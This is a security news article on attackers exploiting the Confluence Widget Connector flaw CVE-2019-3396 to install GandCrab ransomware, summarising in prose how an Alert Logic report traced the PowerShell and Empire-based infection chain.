The collaboration software of the Australian company Atlassian Confluence is again on hackers’ radars. Though the company released a patch for a set of critical vulnerabilities in its lead product on March 20, 2019, it looks like attackers are still able to exploit one of these bugs to infect the servers of thousands of companies worldwide with the widespread and devastating GandCrab ransomware. GandCrab appeared in January 2018, and it is currently still offered by its creators on underground forums to other hacking groups in exchange for a share of the profits. As there are still no free decryption keys for the latest GandCrab 5.2 version, this malware is a major threat for both consumers and businesses.
Based on Java, Confluence is a wiki-type of application that allows coworkers of an enterprise to have a shared space where they can work on common projects and complete tasks. The problematic vulnerability tracked as CVE - 2019 - 3396 is related to Confluence’ Widget Connector - a functionality that allows users to embed content from social media or other websites into web pages. This security flaw allows attackers to inject commands into “_template” and subsequently achieve unauthorized remote code execution. That allows them to acquire complete control over the targeted host. According to representatives of the Australian company, affected are all versions of Confluence Server and Confluence Data Center prior to 6.6.12, 6.12.3, 6.13.3, and 6.14.2.
This Week In Malware Episode 21 Part 3: GandCrab, REvil, Sodinokibi Ransomware Threats Remain Extremely Dangerous in Q4 2020
Discovered security flaws found as root cause to Confluence Vulnerability
Cybersecurity company Alert Logic just released a report according to which a proof-of-concept exploit code for the CVE - 2019 - 3396 was released publicly on April 10, 2019, and it took about a week for the first breached servers to occur. The first of the affected Confluence customers was injected with a malicious payload which forced the system to interact with an IP address that was well-known within Alert Logic database. Namely, it was initially associated with another security flaw - an Oracle Weblogic vulnerability known as CVE - 2017 - 10271. This finding led the researchers to the conclusion that the same attackers who control the IP address are also responsible for the Confluence vulnerability exploits.
Alert Logic report provides a detailed view of the attacks. After the Confluence servers are compromised, the attackers deploy a malicious payload, which in turn, downloads and executes a malicious PowerShell script on the target system. Then, that script downloads a specifically tailored version of open-source PowerShell post-exploitation agent known as Empire from a Pastebin page. The attackers then use the Empire agent to inject an executable file into the memory of a running process. Further research shows that this executable file is called len.exe, and represents the notorious ransomware program GandCrab 5.2.
The uncommon method to spread GandCrab through unauthenticated remote code execution has puzzled the researchers at first as ransomware is usually distributed through phishing emails with malicious Office documents attached to them. Attackers typically exploit vulnerabilities in server-type software to deploy crypto mining malware as these programs secure a better use of the resources of such systems. In the case of the Confluence vulnerability, however, the attackers have probably considered the fact that the application holds valuable company data that may not be sufficiently backed up, therefore the potential proceeds from a ransomware attack are likely to exceed the profits from mining cryptocurrency on the infected hosts.